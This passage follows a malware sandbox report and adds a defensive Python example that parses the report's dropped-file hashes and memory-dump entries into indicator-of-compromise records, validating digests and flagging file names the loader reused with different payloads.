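The dropped-file entries above (a path followed by MD5/SHA1/SHA256/SHA512 lines) are interleaved with `memory/<pid>-<seq>-<start>-<end>-memory.dmp` entries, and several paths (`setup.exe`, `winnetdriv.exe`, `sonia_5.tmp`) appear more than once with different digests, meaning the loader wrote different payloads to the same name and each digest is its own indicator. The following is an added example, not part of the sandbox report: a small parser that turns this listing into IOC records, validates each digest's length and hex alphabet, flags paths that were written with more than one SHA256, and groups memory dumps by PID. The record layout and function names are my own; the sample input is an excerpt of the listing above (SHA512 lines omitted for brevity, the parser handles them).

```python
# Added example: turn a sandbox report's "Files" listing into IOC records.
# Not part of the report; record layout and function names are assumptions.
import re
from collections import defaultdict

HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HEX_RE = re.compile(r"^[0-9a-f]+$")
MEM_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

# Excerpt of the report's listing above: five file records, two memory dumps.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp

MD5 2c06923b75f6d7aa0df4741a7ba85f1c
SHA1 4fce80e37e0e80d29714d05f7b124bdb739680d6
SHA256 d764f0742ffcb83e50ab55922d6985944ad4e09a385c9422c0d289a225912d71

memory/4400-134-0x0000000004F80000-0x0000000004F9E000-memory.dmp

memory/2176-138-0x0000000000400000-0x000000000051D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 99c083660d4b4e64464340356b5ce089
SHA256 96302eeeb96f5adb537d80be490e969e5bc94c9f8298eee4e75ee2897724152e

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 a155e7e91cd053878f30ea6380390829
SHA256 66d98ee6c310e5546ad81a575556693bfa9772e7f034defedffec421592a324e

C:\Users\Admin\AppData\Local\Temp\setup.exe

SHA256 851cda9da7d01efddc92ed29fb6b7408414bf37c01fb9690a2101c61249b9456

\??\c:\users\admin\appdata\local\temp\is-qvqsg.tmp\sonia_5.tmp

SHA256 7bed8150acf8d5b56701429cce7ed02af18b4cd543fff879af6b2bbe4521eac1
"""


def parse_listing(text):
    """Return (files, dumps): file records {path, MD5, SHA1, ...} and
    memory-dump records {pid, seq, start, end}."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            dumps.append({"pid": int(m["pid"]), "seq": int(m["seq"]),
                          "start": int(m["start"], 16), "end": int(m["end"], 16)})
            continue
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0] in HASH_LENGTHS:
            algo, digest = parts[0], parts[1].strip().lower()
            if current is None:
                raise ValueError("hash line before any path: " + line)
            # Wrong length or non-hex characters means a copy/paste or
            # extraction error, not an indicator; fail loudly.
            if len(digest) != HASH_LENGTHS[algo] or not HEX_RE.match(digest):
                raise ValueError(f"malformed {algo} digest: {digest!r}")
            current[algo] = digest
            continue
        current = {"path": line}  # any other non-empty line starts a new file record
        files.append(current)
    return files, dumps


def normalize_path(path):
    # "\??\" is the NT object-namespace prefix for a Win32 drive path; drop it
    # and lower-case so both spellings of one file compare equal (NTFS paths are
    # case-insensitive by default).
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def unique_sha256(files):
    """Deduplicated SHA256 set, the usual unit for blocklists and hunting."""
    return sorted({f["SHA256"] for f in files if "SHA256" in f})


def same_path_different_content(files):
    """Paths written more than once with differing SHA256: a stager that
    re-fetched or overwrote its payload. Each digest must be tracked separately."""
    by_path = defaultdict(set)
    for f in files:
        if "SHA256" in f:
            by_path[normalize_path(f["path"])].add(f["SHA256"])
    return {p: sorted(s) for p, s in by_path.items() if len(s) > 1}


def dump_ranges_by_pid(dumps):
    """Map PID -> list of (start, end) address ranges, in listing order."""
    by_pid = defaultdict(list)
    for d in dumps:
        by_pid[d["pid"]].append((d["start"], d["end"]))
    return dict(by_pid)


if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE)
    print(len(unique_sha256(files)), "unique SHA256 values")
    for path, digests in same_path_different_content(files).items():
        print(path, "written with", len(digests), "different payloads")
    print(dump_ranges_by_pid(dumps))
```

Run against the full listing, the same-path check surfaces every name the loader reused (`setup.exe` three times, `winnetdriv.exe` and `sonia_5.tmp` twice each), which is why hunting on filename alone would miss most of these payloads; the SHA256 set is what belongs in a blocklist.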